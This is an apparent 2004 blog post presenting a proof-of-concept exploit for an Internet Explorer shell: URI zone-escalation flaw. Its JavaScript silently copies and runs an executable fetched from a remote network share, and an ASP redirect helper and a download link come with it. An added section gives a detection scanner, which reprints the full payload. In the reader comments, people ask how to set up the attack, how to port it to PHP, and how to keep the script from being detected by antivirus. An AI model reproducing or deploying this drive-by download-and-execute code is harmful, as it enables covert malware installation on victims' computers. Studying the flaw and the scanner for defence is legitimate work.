IE Shell URI Download and Execute, POC Exploit

13.07.2004


The code is based on the message at http://www.securityfocus.com/archive/1/367878 (POC by Jelmer). I added one feature: the payload downloads an executable and then runs it. I also use WScript.Shell from JavaScript instead of Shell.Application.

// Runs in the outer (Internet-zone) page. The frame below was opened through the
// shell: URI, so it holds a local file; the script written into it copies bad.exe
// from an anonymously reachable share to %windir%\_tmp.exe and starts it, both with
// a hidden window (Run's second argument is 0). Every backslash is doubled twice
// because the path sits in a string literal inside a string literal: the
// "\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER" written here is \\IPADDRESS\NULLSHAREDFOLDER at run time.
function injectIt() {
	document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER> var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; var wF="%windir%\\\\_tmp.exe"; var o=new ActiveXObject("wscript.shell"); var e="%comspec% /c copy "+rF+" "+wF; var err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);   // give the frame a second to load before injecting into it

This copies an executable (here bad.exe) from the share into the victim's Windows directory as _tmp.exe and executes it. The whole sequence is hidden: the cmd.exe copy and the dropped program both run with window style 0, and the first Run call waits for the copy to finish before the second starts the file. It works because the iframe was opened through the shell: URI, so the local TIP.HTM renders in the Local Machine zone, and the script injected into that frame runs there rather than in the Internet zone, which is what lets it instantiate WScript.Shell. Note that the literal </script> inside the injected string ends the outer script block if the code is placed inline in an HTML page; keep it in an external .js file or split the tag.
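As an added example (my code, not part of the original post or of the download), the following JavaScript unwinds the two escaping layers that the comments below stumble over, and then scans page source for the two indicators this PoC needs together: an iframe loaded through the shell: URI and a script that instantiates WScript.Shell. The sample page source is constructed from the PoC's own two lines; IPADDRESS and NULLSHAREDFOLDER are the post's placeholders, not real hosts, and the function names are mine.

```javascript
// Added example (not code from the original post): unwinds the string-escaping
// layers in the PoC payload and extracts the indicators a defender would look
// for in captured page source. SAMPLE_HTML below is constructed for this
// example from the PoC's own lines; IPADDRESS and NULLSHAREDFOLDER are the
// post's placeholders, not real hosts.

// Resolve one layer of JS string-literal escaping: for every backslash escape,
// drop the backslash and keep the next character. This covers the escapes the
// payload uses (\\ and \"); it does not translate \n, \t or \xNN.
function unescapeLayer(literalBody) {
  let out = "";
  for (let i = 0; i < literalBody.length; i++) {
    if (literalBody[i] === "\\" && i + 1 < literalBody.length) {
      out += literalBody[++i];
    } else {
      out += literalBody[i];
    }
  }
  return out;
}

// The path sits inside an inner string literal (var rF="...") that is itself
// written as part of an outer string literal (the insertAdjacentHTML argument),
// so every backslash is doubled twice in page source.
function resolveLayers(outerLiteralBody) {
  const afterOuter = unescapeLayer(outerLiteralBody); // what gets written into the frame
  const afterInner = unescapeLayer(afterOuter);       // what the injected script runs with
  return { afterOuter, afterInner };
}

// Peel escaping layers off a backslash-heavy candidate until a plain UNC path
// (\\host\share...) appears; return null if it never does.
function unwindUnc(candidate) {
  let s = candidate;
  while (/^\\{4}/.test(s)) s = unescapeLayer(s); // each layer doubles the backslashes
  return /^\\\\[^\\]+\\[^\\]+/.test(s) ? s : null;
}

// Look for the two things the PoC needs together: an <iframe> loaded through the
// shell: URI (a local file, rendered in the Local Machine zone) and a script that
// instantiates WScript.Shell. Also recover any UNC path hidden under the escaping.
function scanForShellUriPoc(html) {
  const findings = { shellIframes: [], wscriptShell: false, uncPaths: [] };
  const iframeRe = /<iframe[^>]*\bsrc\s*=\s*["']?(shell:[^"'>\s]*)/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) findings.shellIframes.push(m[1]);
  findings.wscriptShell = /ActiveXObject\s*\(\s*["']wscript\.shell["']\s*\)/i.test(html);
  const uncRe = /\\{2,}[^\\"'\s]+(?:\\+[^\\"'\s]+)+/g;
  while ((m = uncRe.exec(html)) !== null) {
    const unc = unwindUnc(m[0]);
    if (unc !== null) findings.uncPaths.push(unc);
  }
  return findings;
}

// Constructed sample: the PoC's own two script lines as they would appear in a
// captured page, with the post's placeholders left in.
const SAMPLE_HTML = String.raw`<script>
function injectIt() {
  document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER> var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; var wF="%windir%\\\\_tmp.exe"; var o=new ActiveXObject("wscript.shell"); var e="%comspec% /c copy "+rF+" "+wF; var err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
</script>`;

// Walk the placeholder path through both layers, then scan the sample.
const layers = resolveLayers(String.raw`\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe`);
console.log("written into frame:", layers.afterOuter); // \\\\IPADDRESS\\NULLSHAREDFOLDER\\bad.exe
console.log("runtime value     :", layers.afterInner); // \\IPADDRESS\NULLSHAREDFOLDER\bad.exe
console.log(scanForShellUriPoc(SAMPLE_HTML));
```

The scanner deliberately ignores the shell: iframe's own backslashes (shell:WINDOWS\\Web\\TIP.HTM never unwinds to a \\host\share form), so it reports only the share path the payload copies from; a content filter that keys on either indicator alone will fire on ordinary pages, whereas the pair plus a recovered UNC path is specific to this technique.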

I also converted redir.jsp from the original POC to redir.asp:

<%
' Make sure the response is never cached by the client or a proxy.
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
' Busy-wait to delay the redirect; raise the loop bound for a longer delay.
For x = 1 to 500000 'Time
   z = z + 10
Next

' Redirect into a resource inside the browser's own DLL (res:// is a local URL).
Response.Status = "302 Found" 
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>

Download : http://ferruh.mavituna.com/exploits/fm_ieshell.zip

Comments

I want to test your scripts, but I don't know how to replace \\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\ .
Please advise! Thanks.

How to set \\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\ ? [ 14.07.2004 ]

"\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"
Must I have a server which has a null share? Can I replace this with a file stored on a web server?

[ 14.07.2004 ]

I will test it. Does anyone know a free server that supports ASP to test it on?

Also, the .JS is detected; any ideas to make it undetected?

Droopy

Nice mod [ 14.07.2004 ]

Hi,
I have executed some tests related to your technique and did not succeed in reproducing this issue in my lab.
The server hosting the files is a Windows 2000 Professional with ASP support. The clients tested are a Windows ME and a Windows 2000 Professional without any new patches.
I have tested some code variants and had no success with them.
There are some functional PoCs at http://www.safecenter.net/UMBRELLAWEBV4/ie_unpatched/index.html, like http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-Demo/index.html. But some files can't be downloaded (like RedirGen.asp).
I have been trying to reproduce an IE AutoExec technique for two weeks, without success!
All help is welcome.
Thanks for your attention and sorry for my bad English (I am a poor Brazilian guy).
Best regards.

Doesn't work! [ 15.07.2004 ]

Hi...

I want to change the Windows and ASP environment to Linux and PHP...
Please advise me...

Linux and PHP [ 15.07.2004 ]

Can redir.asp be converted to redir.php?
Sorry, my English isn't good.

[ 16.07.2004 ]

I cannot get this to work on 2003. I have replaced the IPADDRESS on my machine.
Does anything else need changing?
Thanks

ahh [ 26.07.2004 ]

Brother, can't this site be written in Turkish? We live in Turkey. I can't understand this obsession with foreign languages.

acemi [ 11.03.2005 ]

acemi, my brother, let it be. I saw this site too; the man is teaching foreigners, and that's great :)))))))))

mehmet ahmet [ 03.09.2006 ]

© 2002-2007, Ferruh Mavituna